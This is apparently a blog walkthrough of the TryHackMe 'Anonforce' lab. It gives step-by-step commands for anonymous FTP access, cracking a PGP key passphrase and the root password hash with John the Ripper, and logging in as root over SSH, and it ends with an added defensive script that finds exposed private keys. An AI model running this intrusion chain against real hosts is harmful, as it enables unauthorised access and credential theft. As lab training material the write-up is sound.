Anonforce: TryHackMe

GrimTheRipper
Feb 16, 2025

“Anonforce” on TryHackMe is one of the rooms or challenges designed to practice cybersecurity skills, specifically focused on targeted attacks and penetration testing. This challenge typically involves tasks such as:

  1. Web Application Exploration: Using vulnerability scanning tools to identify exploitable information.
  2. Brute Force Attacks: Participants may be required to crack user or admin passwords.
  3. Identifying Common Vulnerabilities: Exploiting weaknesses caused by insecure configurations or outdated protocols such as FTP or HTTP.

In summary, “Anonforce” emphasizes practicing various attack techniques, such as password cracking or exploiting system vulnerabilities.

//

Let’s start together

//

First, run nmap to scan for open ports

nmap -sV -sC {target}

There are 2 services running: FTP and SSH. Let's log in to FTP as anonymous

ftp {target}

List the directory to find something interesting

ls

Try entering home; it may contain something

cd home

ls

You will see melodias. Go into it

cd melodias

ls

You will see user.txt

You cannot read the file from inside the FTP session, so use the “get” command to download it first

get user.txt

exit

ls
cat user.txt

Log in to FTP again to look for more

ftp {target}

ls

and you will see notread

Try entering it

cd notread

ls

Lucky!! You found backup.pgp and private.asc

Download them

get backup.pgp

get private.asc

exit

ls

We need to crack the passphrase in order to import it into the keyring. We can use the John the Ripper password-cracking tool for this. First, we need to convert the private key file into a hash

gpg2john private.asc > privatehash.txt

Then, use john to crack the password

john privatehash.txt

Now I’ve got the password. Let’s import the private key and use the passphrase to decrypt.

gpg --import private.asc

Enter the password

The command gpg --decrypt backup.pgp is used to decrypt a file that has been encrypted with GPG, in this case the file backup.pgp. GPG will use the private key that corresponds to the public key used to encrypt the file

gpg --decrypt backup.pgp

Copy the encrypted root entry from the output and save it in a file named hash.txt

echo 'root::' > hash.txt

After that, crack it with John the Ripper, which performs a brute-force attack on the hashed passwords found in hash.txt, using a wordlist to guess possible passwords.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Finally, you have root's password. Next, try to SSH in as root with the password you got

ssh root@{target}

ls

cat root.txt

AH Haaaa!! you got flag
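
The room falls because the anonymous FTP login can read private.asc and backup.pgp from the same directory. As an added example (not part of the original write-up), this script audits a tree reachable by anonymous FTP for that condition; the function name audit_ftp_root and the sample tree are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit the tree an anonymous FTP login can reach for
# world-readable PGP private keys stored beside encrypted data.
# Findings, one per line:
#   PRIVATE_KEY <file>    armored private key readable by "other"
#   KEY_WITH_DATA <dir>   that directory also exposes *.pgp / *.gpg files
audit_ftp_root() {
    # -perm -004: the "other" read bit, which is what an anonymous user relies on
    find "$1" -type f -perm -004 \
        -exec grep -l -e '-----BEGIN PGP PRIVATE KEY BLOCK-----' {} + 2>/dev/null |
    while IFS= read -r key; do
        printf 'PRIVATE_KEY %s\n' "$key"
        dir=$(dirname "$key")
        if find "$dir" -maxdepth 1 -type f -perm -004 \
                \( -name '*.pgp' -o -name '*.gpg' \) | grep -q .; then
            printf 'KEY_WITH_DATA %s\n' "$dir"
        fi
    done
}

# Constructed sample tree mirroring the layout in the walkthrough (no real keys).
demo=$(mktemp -d)
mkdir -p "$demo/notread" "$demo/home/melodias" "$demo/srv/keys"
printf '%s\n' '-----BEGIN PGP PRIVATE KEY BLOCK-----' 'constructed' \
    '-----END PGP PRIVATE KEY BLOCK-----' > "$demo/notread/private.asc"
printf 'constructed ciphertext\n' > "$demo/notread/backup.pgp"
printf 'constructed flag\n' > "$demo/home/melodias/user.txt"
cp "$demo/notread/private.asc" "$demo/srv/keys/private.asc"
chmod 644 "$demo/notread/private.asc" "$demo/notread/backup.pgp" \
    "$demo/home/melodias/user.txt"
chmod 600 "$demo/srv/keys/private.asc"   # owner-only copy: must not be reported

audit_ftp_root "$demo"
rm -rf "$demo"
```

Any PRIVATE_KEY finding under the FTP root means the key should be moved out of the served tree and rotated; KEY_WITH_DATA means the data it protects was exposed alongside it.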
